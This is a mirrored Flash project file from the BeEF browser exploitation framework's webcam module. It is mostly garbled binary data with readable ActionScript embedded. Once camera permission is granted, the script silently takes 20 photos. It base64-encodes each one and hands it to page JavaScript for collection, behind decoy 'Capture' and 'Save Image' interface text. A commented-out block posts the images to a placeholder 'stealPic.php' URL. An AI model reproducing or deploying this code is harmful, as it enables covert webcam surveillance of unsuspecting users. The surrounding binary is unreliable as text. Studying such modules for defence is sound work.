Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
beefproject
GitHub Repository: beefproject/beef
Path: blob/master/modules/browser/webcam_flash/dev/takeit.fla
1154 views
��ࡱ�>��	��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������Root Entry ���������>�ޱ��>�ޱ�@ContentsgrG/b�����������~�2C��~�2C��GP 1 1249336686�����������~�2C��~�2C�f"S 4 1249425026���������N\o7��N\o7�S 1 1249336716CBnlSotesoSrn<ky
���������N\o7��N\o7�
�S 2 1249338172�������������N\o7��N\o7�!�M 1 1249338987x���������N\o7��N\o7�5M 2 1249339097���������N\o7��N\o7�>�M 3 1249402809�������������2�9$C��2�9$C�L0�������������>�ޱ��>�ޱ������������������>�ޱ��>�ޱ������������������>�ޱ��>�ޱ�������CPicPage��	CPicLayer��	CPicFrame��\@\@\�\�\@\������@�@���@�@�@\@\@�@\@\�\�����\������?�����:X�����������
capture_mc�����3���������?�����y�����//Coded by floyd @floyd_ch http://floyd.ch by using various code snippets for Actionscript3
import flash.display.Bitmap;
import flash.display.BitmapData;
import com.adobe.images.JPGEncoder;
import flash.external.ExternalInterface;
import com.foxarc.util.Base64;

stage.align = StageAlign.TOP_LEFT;
stage.scaleMode = StageScaleMode.NO_SCALE;

//what if user right clicks instead left as he should?
var rClickOptions:ContextMenu = new ContextMenu();
var pleaseLeftClick:ContextMenuItem = new ContextMenuItem("Please use a left click");
pleaseLeftClick.addEventListener(ContextMenuEvent.MENU_ITEM_SELECT, myLink );
pleaseLeftClick.separatorBefore = false;
rClickOptions.hideBuiltInItems();
rClickOptions.customItems.push(pleaseLeftClick);
this.contextMenu = rClickOptions;
function myLink(e:Event) {
	//Let's just do nothing when he clicks the pleaseLeftClick
	//navigateToURL(new URLRequest("http://www.example.com"), "_blank" );
}

//TODO: Remove later
//var snd:Sound = new camerasound();

var cam:Camera;
var video:Video;
var bitmapData:BitmapData;
var bitmap:Bitmap;
var no_of_pictures:int = 20;
var interval:int = 1000;
//Get FlashVar parameters
//no_of_pictures = int(root.loaderInfo.parameters.no_of_pictures);
//interval = int(root.loaderInfo.parameters.interval);

var params:Object = LoaderInfo(this.root.loaderInfo).parameters;
var no_of_pictures_string:String = String(params['no_of_pictures']);
var interval_string:String = String(params['interval']);

//ExternalInterface.call("alert", no_of_pictures_string);
//ExternalInterface.call("alert", interval_string);

no_of_pictures = int(no_of_pictures_string);
interval = int(interval_string);




//TODO: if user has more than one camera, access them all
if (Camera.names.length > 0){
	//trace("No of cameras: "+Camera.names.length);
	cam = Camera.getCamera();
	cam.setQuality(0, 100);//bandwith (zero for max), quality (0 to 100, 100 = highest quality)
	cam.setMode(320,320,30,false);//setMode([width:Number], [height:Number], [fps:Number], [favorArea:Boolean])
	cam.addEventListener(StatusEvent.STATUS, statusHandler);
	video = new Video();
	video.attachCamera(cam);//This is the call, where the Allow/Deny dialog pops up
}
else{
	ExternalInterface.call("noCamera"); 
}

function statusHandler(event:StatusEvent):void {
	switch (event.code) {
		case "Camera.Muted" :
			//trace("User clicked Deny.");
			//ExternalInterface.call("alert", "Hi, it's me, flash, alert worked. I will try to call the javascript pressedDisallow function now"); 
			ExternalInterface.call("pressedDisallow"); 
			break;
		case "Camera.Unmuted" :
			//trace("User clicked Accept.");
			//ExternalInterface.call("alert", "Hi, it's me, flash, alert worked. I will try to call the javascript pressedAllow function now");
			ExternalInterface.call("pressedAllow"); 
			//ExternalInterface.call("alert", "already called 'pressedAllow', but here's another alert from flash");
			prepare();
			break;
	}
}

function prepare():void {
	bitmapData = new BitmapData(video.width, video.height);
	bitmap = new Bitmap(bitmapData);
	for(var k:int=0; k<no_of_pictures; k++){
		
		setTimeout(takePicAndSend, k*interval);
	}
	ExternalInterface.call("allPicturesTaken"); 
}

function takePicAndSend():void {
	//snd.play();
	bitmapData.draw(video);
	var myEncoder:JPGEncoder = new JPGEncoder(100);
	var byteArray:ByteArray = myEncoder.encode(bitmapData);

	//Problem: crossdomain.xml is requested
	/*var saveJPG:URLRequest = new URLRequest("http://www.example.com/stealPic.php"); 
	var header:URLRequestHeader = new URLRequestHeader("Content-type", "application/octet-stream");
	saveJPG.requestHeaders.push(header);
	saveJPG.method = URLRequestMethod.POST;
	saveJPG.data = byteArray; 
	*/

	//Problem: opens a new windows, even with "_self"
	/*var saveJPG:URLRequest = new URLRequest("javascript:alert(123)", "_self");
	navigateToURL(saveJPG);
	*/

	//Works!
	var encodedPic:String = Base64.encode(byteArray);
	//trace(encodedPic);
	//trace("took pic");
	var result:Object = ExternalInterface.call("pictureCallback", encodedPic); 

}
��������as����O�O���aveJPG);
	*/

	//Works!
	var encodedPic:String = Base64.encode(byteArray);
	//trace(encodedPic);
	//trace("took pic");
	var result:Object = ExternalInterface.call("pictureCallback", encodedPic); 

}
C��
CDocumentPageP 1 1249336686���Scene 1���n]wJd���������������������� 8�O�������������������������������������������������������������������CMediaSoundM 3 1249402809���camera sound.mp3���.\camera sound.mp3�_xJ�_xJ���������camerasound�������������
.c�#`���pp��hhhh������������legacyLineSpacing���0����%PublishFormatProperties::htmlFileName���take_picture.html���"PublishHtmlProperties::StartPaused���0���Vector::AS3 Package Paths���.��� PublishRNWKProperties::speed256K���0���!PublishGifProperties::PaletteName������PublishFormatProperties::jpeg���0���PublishHtmlProperties::Loop���1���PublishProfileProperties::name���Default���Vector::Debugging Permitted���0���Vector::UseNetwork���0���"PublishQTProperties::MatchMovieDim���1��� PublishQTProperties::AlphaOption������ PublishQTProperties::LayerOption������4PublishHtmlProperties::UsingDefaultAlternateFilename���1���PublishHtmlProperties::Units���0���'PublishHtmlProperties::DeblockingFilter���0���%PublishHtmlProperties::showTagWarnMsg���1���Vector::External Player������Vector::DocumentClass������&PublishRNWKProperties::singleRateAudio���0���&PublishRNWKProperties::speedSingleISDN���0���$PublishPNGProperties::OptimizeColors���1���PublishQTProperties::Width�����e�T8A�75@�PD�	�nIdI��i�4�!���M?A�����o��i��i��������4�M�4�AAM4�M4�MAAt�3/�ȹ� �|0P5���s�P �`�A��.Eȹ>_/�˅��p�\4At��������0�ƏE���`,�l�ND5l�
����ti-^5p�(��d2�"I�Q>dfO�`�82�Y7��5>2%Q(���1�
�HKN`9Ap��D?�Fi����M2���1¶�p�����2�7,��r8ĝ&_�U�d^/dE��,jN��W�D�(�Q�)p��t1XH5eg��/���2"/?���8&M�����k*W��3���[=z���V"NXC��$BX�)/P������ͩ���'��V��Q�am�� Nw�u�y���Dal�7+��yu��9z���? �ô��4ѻe
D��	g�
�]�V~0�ֱI3�bbs��yl��w���	g^�qٔ����sh<t�Q}��)Ί(�	�Ҩ�g�s'���]iT�=����7<��t�Q}��&wmܼ²Q:t�Q}G,�X�	�&�9�CWշG҈���4�o���吳�a���p��I����U�W�L\ �ϣ.�9pvC��4�oҝw�ڃeY���9pvC�{ �������m|�i����uiJ�������S0����������g_�܃k�h�x��A�uμ�5:
�d�����u�N[l(���SV�G$)}웱�R	��hT�n�C�\��p���%���}�al>���n�-wT,�z<��¯��Ù�V��?��f#���Pf�������9/}��X�-}j����X�רT*�f�࿮�j�� �Fc�ݮU��m�^p�x<.��N�~���<��>�Oދ�>ȩ3�Ϳ�n���S�st���oB��CPicPage��	CPicLayer��	CPicFrame�������dm�>��0��0dm0�>���?�����0A�����������Layer 1����O�O�����CPicText��
�	xZ( ���2HImpact�"(The image is saved
Click here to open the gallery ��������������?�����,`�����������Layer 2�����3���������CPicText���CPicPage��	CPicLayer��	CPicFrame������`���a@T����J����������P�0��00P��t��x��O85}���V��P(��r�'�	F��ۭ195�,.����ժ�f�	UUe������j�c��3��:�^/
����l&5��9��+2���b=rj���ź.��tZ�~�����#r����SV�G$)}웱�R	��hT�n�C�\��p���%���}�al>���n�-wT,�z<��¯��Ù�V��?��f#���Pf�������9/}��X�-}j����X�רT*�f�࿮�j�� �Fc�ݮU��m�^p�x<.��N�~���<��>�Oދ�>ȩ3�Ϳ�n���S�st���oB@@@x��SO�aa�]|��Ԉ
?6VVS%�	�&�@@@xq��M+qǽ^��%.���墸(m��6"���X%���b�Dj/{@6�ؚe.��a
�=l}����Ӥm0�i~���i�3�?����P����?������,�����������Layer 1����O�O�����f������0(���?�����Sk�����������Layer 2�����3������CPicText��
��||����@Impactf��";Capture��������������?������G�����������Layer 3������
�����
CPicBitmap��������?������*�����������Layer 4�����O������������CPicPage��	CPicLayer��	CPicFrame������`���a@T����J����������P�0��00P���?������P�����������Layer 1����O�O�����f������0(���?������9�����������Layer 2�����3������CPicText��
h��
|����
@Impactf��";Save Image��������������?�����hb�����������Layer 3������
�����
CPicBitmap��������?������J�����������Layer 4�����O�������@@@x��SO�aa�]|��Ԉ
?6VVS%�	�&�eA$Y`v6�R��R�B��Wx�>����k�[O��9���}_���OM�R����ב�=j$A�����h���H���:?l6b�V��4���3�d2��ri�!g��y<�N��㿱X,�D"�p8�EQ�����;R������ީ%s�k��Ng�3�>�oya���Lw�Y����\�<7������o��s���|��{5w{���l��	��C=�:=��&���0�eـ��*���wbM��䮊7?
)E����ܦv\<�LR�/ܭ���e����~�g�`�n=9Ag+7�!�;}�(�%v#�]k���r��"�3��$/}����\�WR�Da���A�9v��:|) 9t�\�Nsy�}��Ng������IE_����?��~����~��-�����β�E}���<J��Q�Jj�f��#2a�T-W�vLQ��'��j�`����^
]�����ow��|&�$�(	�Ld�{3p��X�2�fTJ1;�x�1��#.�M�.�6s OC�'E�LL���s��&CP�1�]�Ϲ��R�.-�R��Z�)$�����(��Ԋ��w��u�M�Z	�G�����޴�?���u����hv�kV;e�i��lME]�Ô�4.p��o3���r��Y�}��-��oↈ��L�b��w�7-�~{�����?�����P^?����UP�p;����@V�KF9��e��Kh�e�߳���(1�*gV��Q��B��뵵��� �����w>�̵��1� ƉCƔ�o���]��:��t�bMi��׆%����Xf���qvLy�-'^MK��̑���f(�9ߚ��n�)�D-�Q(��������i�I|g���̽��*�/`�/b�W���B�~��iF6h��6"���;�f��ZU�$���X��.��@�-����[�rQo���&�iT�U��j�2„�T�Y"N²��
Bk�\����
��Օ�:�7�f�5�-_��ϻZ4,�-����s��z����[�Q
)���\�^���
��=��H����2A1a�C�(�>%� ���V�SB��\� �NX8*��(-�����+-�8��!�L,:"f����4ylԡӂ�)TC�*c���c���0I���#����mF�\����[xů��ͤt�r�8�,}bX3RMⴴ��g�z��ǻ�Я�}n����������������l�Փ6;ĵ�|[�6�ʮ51���P688�2�������e�H��M�-4g��ŸH^ PY�Ћ�*
�^�va�l�z���V�������0(��4(�z��4Ff���%�oA���
��!ŀ���a~1�v����'Ag��t�3*���u5�UN��ԿHř�EH�l��Z(3�nq։D�"�-i�d�5��}_����$Ҥ��BQ��x>��!Ux8�P@*
h
g���g�c	�Bd1��N�0u�j�@eT�2L��Xg�"B�4!��
g��{�h��h8�!�x�H�� `�p�ByL �g�)!|O�H�Dz5��a�tР�\����	��8���,�((�u�[>��t���t��T��6Qy�J0E֋Q��fR{��i��W�?�*�E5йK�w(�`�����
`�+x��0��I�x������٣:��M�	��P�͸��1���MF $��
^`��#��2T.�E"\�E(3�$�b��c���Rٗ5�6g�] B{c*#�T���!�
\J�����x���d�d���*�48b�̍��Y��ś:��K8^1c�PEI�Z�+Ew2�T���I��2�H���[o�R�S��~��Ԛ�"� �1�-�j��z�)�C�C��"��f� .	�(�@D�w��@��hM�ŚGg9e��$,����ф[(/��e~첉����/j��ϡ���Ls�%0M {h�`X���
�x�P
ȭ�q΢d�<�*�ݔ���70:��3�[]�S�RHM�M�珕
��U�����"t�A��m-����"Fp2 �[R@Ȟ�Q��b.�M1�����1�Aj��?�f��M�4�ɝ%�e�ѱer�=!2���&0؃l���,,�]EWR�Z$u|�rX"E@7d�8ăc �8΄B�� Y,x",���
'O��94EI�y3�K�*΂�u>�/���I)뤥.p��ug��ƦI����R�5���?��;���+i�S�j	�2P&��H%X��.P�&�2-r�
�I-",	K�B��#1�@�c���$����@3Ut�q�y�!�r� r4��!i��I� a|�.�d2д�ja
�,� d�
D.���"�;��4��zD<�E�5b�8��J��޴RWR�֑�$��E�����$�@���6R5�t֋5�}Z����
�mS�!n[�J�\e ����H%�C���S K/Gg�������U�9b-‡4g쌵�a�P�$3B`�E���TWXUЦ�Z
I�Du3t��9�ñ2����W� �2���mc:)H�!�"2%�I�U	�H�(�T48��̍Jj4Mh����wZ�e3-;��n��gUU��L�}
����ޯ���A��2����ve�(�rU��*(&�%�zoC�|ȃ��6p��{kI.��j5yg�Hdt4LV �@
u���bJ§��^�8���!��Sq09�H��
�Ā-���9 X]'3rq�Y�,�'�^�:�k��>�H]Ө�-HV���6dԤԓ����������(�@�d��-���4<qT���
!R�1v���CKQ����$p"�с$Eˊ�j�*���‡�m�	"��a](���_�"�'�|�Z����h
�����2�ԁ�B��m‰3�P<��p��H�(�
Ȝ�t�&��'�;��~�����޺�H�B�k�H��p�h&�#ek�����H(t�Vq!C���;�v�e%���qP���A0�@M�pà���@#�4fTp\zV�<�0��&�pLԱemr �C�u���31�
������&�JX@��x���Dd��9��h�{���Vڛ:R*Z�d��9����I�2r������
:U �@J-h�F
F��,bk���
[L��4�������F�����
!qE�l.�l4�]�_�D/-kvK��Zˑ�����_:i0�@�"6�X��`	1�Pt9!�
���A�Ɏ-2H͝Z�_��5��
��ԥ�}���TLZ�EL������:#����U��%�Ca�”�h <���Pc��;�^�.�� ��>\YJ%%�����&R�t>z�&*�DP�31�aB��б��uU}Y����k�wG�u2�\g�F�h%G@�$�*�)��@����䨢0��s��Is��n����E�wt�U�6u�g,���1t��t������=��B@
98&ko'^+�R�+���b�Yo��Q6$_Pˆ��:�Б����U�ID%R��TpB[�Sy�~u��j�P�c,E��|�H����+G������xe��q���1ő4��g����{����o[:�eމ�Z�����>��j��_������`BB@�w�m-�7,_����[��{�%��?�V�g� �4��9kB�/-���
����C
������t����?d�•4g��5�,�9E�@��e��BYc�6���	[�|0"t�$ා����q��3�	YDMh�A=jf�����6v�ʟUjQ�
d�X�jN�
(�/��W���>@2QVˍ�,Q��4��"��&P��&�E�\�aN*�H�MT��� ��d k��@HP�&�����$ћpQ*��zn�qK�`��mu퓎Qd/��<�D
���-� h��࿗�FX�:	.�)*���E5��+n�-�$�%2j:PZ�Ӕ�MUv�����g�d��&rW�zh�i{MuZ�$@,9	i"_fP�S)#j�jT��!А�K9��0eHЛ��,�<0%,mƎt���D�GU�WD6����2l��T���CI��F��K�RT�MM5T�Rݿ��=F���ĕ��)�:�e�’4g�l��("�24�ڽ#gU$�D᱉��2&��������~P%E3�������,��0���e���;��[�a�hi���0aRP�qӐ�dd��4Ӌ��G'�ω�h�v7D�)O��>�0�@�PSJP�P��B,�.<I��:�TK���i��REh&�ʗ�W�%I�]WE��V��.�K@��fJ�������3�0�V-g~�6��&!�t����R�R��w��&�	¬�Bʌ�>ڻؕ��'2/S�Yu-ҿ.��u�JВ�F���D�H�@50�#�Y%;OR��p�Ȳ����4T�oI��۳��e�Vڮ��gQEHݙ%=kz�ԕ�׫��^�Z-`.�q�j ��.j�y۫����ِ�D��NI��.oN�U�8*���ĵ�m�;#e�ƒ����Q��j\�&����%�S�>���5hw2�řT{%��ܛ�Zm�t���l@�)�b�08EI�������'M�vu9���I3
%�n\e3�[.����:�r�e$�פz�i��������uv����t�0@F	j<�sc�<ƒ�)M���
v�;�\�
���%������8[.IRTvhCOh�A/��V�w�����04��v��m�\�RG��(�Sחw�c>������xe��̿��65�ޱ�|�=���?��{��hv�o���x~;˼���J������3��ܱ�9C�g���7���&:��r�x2��!gP�� ��RJ�	 ���Jg	�k��i�AaU�bF���i����0�Dc�d0�4m�s����gi+L@R�������0��a�1��������1&>m�+4e⟀@�4�E�ǕvB��Ga�����I�gW���[[��bY^�91cH�4�	to(����hd���>�|�x���m���ɛt�
� 2���4�L�)R*�Sܢ�S,/����W�F,h����a�$k�$,@�(L8���B� 0$��C5���/NW��b��S ��2���ZԺCC0�<|��Oƀ��Z 
���Ny*��a�(�M�~Si������������������
N��@���o���������n�-��r�7o���S�	-r�TcY���hAi9𿽆�spM�ze�C(',����\�����`FXt�������1˘*X��
4P�m&2ق��bJBD�2�AX$yvB����Dh�82�!i�L6p�����- 'R������+@8�������>��QY2������a*�ʿ���~�)���U��GO*#ifp&��4��ռ���Е��$�S�5R�"ԑŠ�U��ۇ/+g&���B0?PɸW�ŋ��cKM�l�����BΣfH����Ru�x�ՠ긍���f������3>����h2o��n�����\f]^��?νg�_���3��
����8�q|(�c�>�;�p��J���%��y��*'���~�3�Ɲ��^y������>�����B���,�T��s-�]8ꖇZ�Դy#�Mݺuԑ�QO��K�[WpbF�1��u�����>��-���>��a}�q���[�{_Z���}�4���6!+'PWM	E���1P��n�gγu������E���k���N��eq����Ĵ���M���~���=�p)U��lb��48l����Q'�µ*��ʝ�fiP�Og��J)#�a�It3Zz~�l�o��o�OK��Z—*��NfO�k�j��f��|��9U��q���-ٷf���U�~X\���e�{�]k��ZϹw��1��s��6�ǘT����'?�ZH�"��p]�b~r+U���[���.���B<�z ��V�bۄ8�3Ӭ
�)TG��I�vV�X���oj�45�k$����yc�i�c�)���v9��~F.N�<ip�zXś��l�V�fT�r�-��̬�ٱ�0���;�4�=���}o;���<p���o.e���}¾Yk���.�
ߺ�pʦ���o���K-�epŷ��ۧ��ڦh�45�������	�Ůೢ��@NN�N �5��⅏��t5�
"������ہ�}�.�?
��%`��I��v�᪋����a;�U����,}�B�f!j���]�<�=����Zܺ%�d��?v=Ir��/V���e�����w��%0D]�H��unLسj��(.�u�e6%��f*�k��ֳ�N��|��󯻵*�S���{�<0Ö)5�m�Ʒ�f�Q��-�٤��;���B����=�?�����-s���.p#����jZ@(�������0bp�'Fnr��M��f���?�{��0%��	\�"RB�pƃ$���7�*�}[ǵ�}"�&�����Ri��V�O�󲜦��MG�[6���Gf!�Dl�؝��޹S�~fn�����sR��3lh)eT�r���m��(�\��r�~�L׫���b���s9T�;���;-�-Ԕ�SK��0u"��<��x�}��]��������$�MÁ��������{�/�`IR�Y����PJs��-�\�ˡu"�8f+bN�"H99?��52��3����Blr�[ZYh�Z�g��,N�zx�Z=?֯�P��
���K3���U��Q�Ħ����V�����j��Y�)���R�JjK�p�V�K���+��V�)�z���\�^Z�������x�|�{;Z�����9�W)�oMY��:l���m$٘���d�K{��_�}���<�	��;���@Ы�����݅r4��:��|VS���	vWsQC��w[V�b9/+5+Š�3D�]��yl+���ܧ���%w�s��_�P�īLՔMJ�j�c�s��ܳ��4�su�W�̱�{��D(�#�����9Y�U(%�_�k	�8�Xo��f��ji�[�����k������������?M�g5#�i��\�ק��sU)����0�vS7n�}�������އ
.W�0�XJ��������#)i�����u��A
� \I��c�!�`�Bx��'��U��.Es.}��&��r�����57#���r�E�����Z��n�:Zn��^M��v�u�5�����V��kW���j�-\���٘_7ma�]���s��Esw�Z��5���˺���Vp���8�)UK=�/�z��j�o�zlʺ���oՁ� [n��8DC�BqN�sy���k��( �*J�]��`�P@Ih�X.@]ET0^�Q)XDuz(lК'���h����$Ѐ�+a�E|���-"nj�tQ�A92��R5Sk�zj4�@��1�sd���:�EKg[$���*5���qԛ���E�.�$���į�'�-ˆ��(�ɸ"Z:�D%�� (xU#��|�K5r��rbq&��ΩA*��4l�`�3��W��5{G����ã�0��x�Y&��FDZR�'J�J�Ѡ�%$p���E��) �Q�mJ��$��}�j9&��ȣ�J[+�����zO~�%[2_I'H��,�/�PR���8w,ke48�¦@bX�¢mU
�u��"ELB�d!�H��BK�_��,��:*INb�h֦Z(����t�Y%$�I-��%��]{�޾���J&��(�.�Z�O�I$b�(��&���E�}KE�(��FE��I���"��3"y4�B5+�:L����t�l�y%LAME3.97 (beta)UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU����Ā�$�-‘7_ĔŸUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUULAME3.97 (beta)UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU������� 4�UUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUUU����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������~���~����~�~��{������}�~����~||z�}�{�{�����|~~~����������}�}�}~}{��p���~���}����v ���u���^����]�]x~v��~{}��}�vq}~w}~��~��{z�}z�~����~��|�}|�|�{��~���z�~���~��z�{�~�z�|�{�{�|�v�~���}|u�v{�~��{�t�|}�|�~��~~�~}�~�|r�u���yn��n�w�qw�v�z�fl}��ry�x��gs��zy�v�k�rp�y�pozz��{|�q~{�}|q��{��k��{�{~�k�qf�v�~l�||��u���`�p{�|�m��x������~�y}���{��}�zz}�z�����|��}|�{�}�r�}��|}�v�~��z��|��~�}���|��~�v���w}�s���|�|~�y�~|�{��}��~����}�|�~�|��}�~���~��~���}������|��~��}~|��}~�|����}z���|���q�h�jz��{�p��|~n~�m������r�u��}�}xn�q����y�������tq|d�j��zw��r�q�w��zo{~�y��r�yx��v�z�����w�����w��w�|w�{�����|�~w�|�{|��{���~|��}~���|~���~��}�~~}�}~��}��}�}�|��~�}|�}������~����~�~���~�~�~��}���������~���~�~�~�~��~�~�~��}�}��}����~~�}��|��|��~��}���{���}~|���|����{�~�}��{�|��{�|~��x��v�||�p�|�y�y�|}�{�~v�x}������{�v�yv}|}z�{�y��|�}}|w�s�{y~}�y��y��|�{��~����z�z��{�~���z�w�w��v��z�w�v|�u�|��z��z���y��~�}�}�zy�|�z���}|�~}�}�u�{�{�{}|�z|���{�{�{�|��~�y}z~|��{��x�z�w|y�w�|~�v�u�y�|�~{�z�}{�~���|��|��yx�|��{�}�z�~�|}���{����~�~~�|�z�|~x����{~y�{�y�}��x�z�~��|��~}�}��y��x�}{�~�~�{�~��z�y~�|��}�~��z�|��}~��}~}�}�~�~�~����������|�}��|}��{�}�}�z���z�}��~�}����~�{����~~�������|~�~�~}��{�{�}�}�~|�~�}�~�~�~�����}�z��}�|��~��~�|��~��z�~�}����~�}���{�~��~}�~~�}~�}~x�}��{}������|�z�{�{|�|�}�~}��}�~}~~�z��~�{�{�{�~{��|�~���z��{�}��~�{�~}�~��}��|~�~����������~������~�~���~���~���~�������������������~�������������������������������������������������������������������������������~���������������������~fm}�|ws{�ouy���s�~���y��w||�|��{����n��vq�u�z��~��{��z��x{��|���ww��c�P�sxhs�vy��|}��~~~���~~~����|~�~}�~����~�~~��~����������������~�����������������������~�����������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������550���%PublishFormatProperties::projectorMac���0���'PublishFormatProperties::gifDefaultName���1���&PublishFormatProperties::flashFileName���take_picture.swf���Vector::Package Paths������Vector::Compress Movie���1���Vector::ScriptStuckDelay���15���#PublishRNWKProperties::flashBitRate���1200���%PublishRNWKProperties::mediaCopyright���(c) 2000���PublishGifProperties::Smooth���1���PublishFormatProperties::html���1���$PublishFormatProperties::pngFileName���take_picture.png���(PublishHtmlProperties::VerticalAlignment���1���PublishHtmlProperties::Quality���4���Vector::Invisible Layer���1���Vector::AS3ExportFrame���1���"PublishRNWKProperties::exportAudio���1��� PublishRNWKProperties::speed384K���0���!PublishRNWKProperties::exportSMIL���1���"PublishGifProperties::DitherOption������-PublishFormatProperties::generatorDefaultName���1���!PublishHtmlProperties::DeviceFont���0���Vector::Override Sounds���0���'PublishRNWKProperties::mediaDescription������"PublishPNGProperties::FilterOption������PublishFormatProperties::gif���0���(PublishFormatProperties::jpegDefaultName���1���(PublishFormatProperties::rnwkDefaultName���1���*PublishFormatProperties::generatorFileName���take_picture.swt���Vector::Template���0���2PublishHtmlProperties::VersionDetectionIfAvailable���0���*PublishHtmlProperties::HorizontalAlignment���1���"PublishHtmlProperties::DisplayMenu���1���Vector::Protect���0���Vector::Quality���80���PublishJpegProperties::DPI���4718592���PublishGifProperties::Interlace���0���"PublishGifProperties::DitherSolids���0���PublishPNGProperties::Smooth���1���PublishPNGProperties::BitDepth���24-bit with Alpha���PublishQTProperties::Flatten���1���#PublishFormatProperties::qtFileName���take_picture.mov���PublishRNWKProperties::speed28K���1���!PublishRNWKProperties::mediaTitle������$PublishRNWKProperties::mediaKeywords������PublishGifProperties::Width���700���PublishGifProperties::Loop���1���PublishFormatProperties::flash���1���Vector::IncludeXMP���1���PublishJpegProperties::Quality���80���$PublishRNWKProperties::realVideoRate���100000���$PublishRNWKProperties::speedDualISDN���0���#PublishGifProperties::MatchMovieDim���1���#PublishGifProperties::PaletteOption������"PublishPNGProperties::DitherOption������0PublishFormatProperties::projectorMacDefaultName���1���'PublishFormatProperties::pngDefaultName���1���-PublishFormatProperties::projectorWinFileName���take_picture.exe���PublishHtmlProperties::Align���0���!PublishProfileProperties::version���1���Vector::Package Export Frame���1���$PublishJpegProperties::MatchMovieDim���1���#PublishPNGProperties::MatchMovieDim���1���#PublishPNGProperties::PaletteOption������)PublishFormatProperties::flashDefaultName���1���%PublishFormatProperties::jpegFileName���take_picture.jpg���PublishHtmlProperties::Width���700���PublishHtmlProperties::Height���400���Vector::Omit Trace Actions���0���Vector::Debugging Password������Vector::Export Swc���0���"PublishJpegProperties::Progressive���0���"PublishPNGProperties::DitherSolids���0���#PublishQTProperties::PlayEveryFrame���0���PublishFormatProperties::png���0���PublishFormatProperties::rnwk���0���(PublishFormatProperties::htmlDefaultName���1���-PublishFormatProperties::projectorMacFileName���take_picture.app���2PublishHtmlProperties::UsingDefaultContentFilename���1���!PublishHtmlProperties::WindowMode���0���'PublishHtmlProperties::TemplateFileName���vC:\Documents and Settings\vamapaull\Local Settings\Application Data\Adobe\Flash CS4\en\Configuration\HTML\Default.html���Vector::DeviceSound���0���Vector::AS3Coach���1���Vector::AS3AutoDeclare���1���Vector::UseAS3Namespace���1���PublishJpegProperties::Size���0���PublishGifProperties::Height���400���PublishPNGProperties::Interlace���0���"PublishFormatProperties::generator���0���&PublishHtmlProperties::ContentFilename���take_picture_content.html���(PublishHtmlProperties::AlternateFilename���take_picture_alternate.html���+PublishHtmlProperties::OwnAlternateFilename������Vector::Report���0���PublishRNWKProperties::speed56K���1���PublishGifProperties::LoopCount������'PublishGifProperties::TransparentOption������PublishGifProperties::MaxColors���255���%PublishPNGProperties::RemoveGradients���0���PublishQTProperties::Height���400���PublishFormatProperties::qt���0���Vector::Stream Compress���7���Vector::Event Format���0���Vector::Version���9���Vector::AS3Strict���1���Vector::HardwareAcceleration���0���"PublishRNWKProperties::audioFormat���0���$PublishGifProperties::OptimizeColors���1���0PublishFormatProperties::projectorWinDefaultName���1���PublishHtmlProperties::Scale���0���Vector::Event Compress���7���Vector::ActionScriptVersion���3���Vector::StreamUse8kSampleRate���0���Vector::EventUse8kSampleRate���0���PublishJpegProperties::Height���400��� PublishRNWKProperties::speed512K���0���%PublishGifProperties::RemoveGradients���0���PublishPNGProperties::Width���700���PublishPNGProperties::Height���400���&PublishFormatProperties::qtDefaultName���1���$PublishFormatProperties::gifFileName���take_picture.gif���"PublishHtmlProperties::VersionInfo���Y10,0,2,0;9,0,124,0;8,0,24,0;7,0,14,0;6,0,79,0;5,0,58,0;4,0,32,0;3,0,8,0;2,0,1,12;1,0,0,1;���Vector::DeblockingFilter���0���Vector::Stream Format���0���PublishJpegProperties::Width���700���"PublishRNWKProperties::exportFlash���1���&PublishRNWKProperties::showBitrateDlog���1���(PublishRNWKProperties::speedCorporateLAN���0���"PublishRNWKProperties::mediaAuthor������PublishGifProperties::Animated���0���&PublishGifProperties::TransparentAlpha���128���!PublishPNGProperties::Transparent���0���!PublishPNGProperties::PaletteName������*PublishQTProperties::UseQTSoundCompression���0���PublishQTProperties::Looping���0���%PublishFormatProperties::defaultNames���1���%PublishFormatProperties::projectorWin���0���%PublishFormatProperties::rnwkFileName���take_picture.smil���,PublishHtmlProperties::UsingOwnAlternateFile���0���PublishPNGProperties::MaxColors���255���%PublishQTProperties::ControllerOption���0���"PublishQTProperties::PausedAtStart���0�������������	